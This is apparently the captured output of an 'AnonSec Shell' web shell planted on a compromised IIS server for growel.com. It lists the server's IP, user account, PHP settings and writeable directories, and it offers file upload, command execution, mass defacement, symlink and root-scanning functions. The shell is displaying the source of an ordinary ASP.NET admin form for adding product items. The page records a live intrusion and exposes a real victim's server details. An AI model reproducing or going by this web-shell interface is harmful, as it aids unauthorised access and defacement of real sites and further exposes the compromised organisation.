. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin/AddSubProductItem.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/GrowelAdmin/Admin.Master" AutoEventWireup="true" CodeBehind="AddSubProductItem.aspx.cs" Inherits="GrowelWeb.GrowelAdmin.AddSubProductItem" %>


<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
    <style>
        .form td
        {
            vertical-align:middle;
        }

    </style>
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">

    <div class="topbutton"><a href="SubProductItems.aspx?subproduct=<%=subproduct %>&type=<%=type %>" class="btn btn-default">Go Back</a></div>
    <h2>Add Subproduct Item</h2>

    <div class="btn-success status" visible="false" runat="server" id="status"></div>
    <table cellspacing="0" cellpadding="4" border="0" width="800" class="form">
<tr>
  <td>Title</td>
  <td>
      <asp:TextBox ID="txttitle" runat="server" CssClass="form-control"></asp:TextBox> <small>e.g. Ferrowash-15</small> <asp:RequiredFieldValidator ID="RequiredFieldValidator2" runat="server" ErrorMessage="Required" ControlToValidate="txttitle"></asp:RequiredFieldValidator>
    </td>
</tr>

<tr>
  <td>DisplayName</td>
  <td>
      <asp:TextBox ID="txtdisplayname" runat="server" CssClass="form-control"></asp:TextBox> <small>e.g. Ferrowash 15</small> <asp:RequiredFieldValidator ID="RequiredFieldValidator1" runat="server" ErrorMessage="Required" ControlToValidate="txtdisplayname"></asp:RequiredFieldValidator>
    </td>
</tr>
<tr>
  <td>Product</td>
  <td>
     <asp:TextBox ID="txtsubproduct" runat="server" CssClass="form-control" ReadOnly="true"></asp:TextBox> <asp:RequiredFieldValidator ID="RequiredFieldValidator3" runat="server" ErrorMessage="Required" ControlToValidate="txtsubproduct"></asp:RequiredFieldValidator>
    </td>
</tr>
<tr>
  <td valign="top">Description</td>
  <td>
       <textarea name="content" id="content" runat="server" cols="100" rows="20"></textarea>
    
    </td>
</tr>
       

<tr>
  <td>&nbsp;</td>
  <td>      
      <asp:Button ID="btnsubmit" runat="server" Text="Submit" OnClick="btnsubmit_Click" />
    </td>
</tr>
</table>

</asp:Content>


Anon7 - 2022
AnonSec Team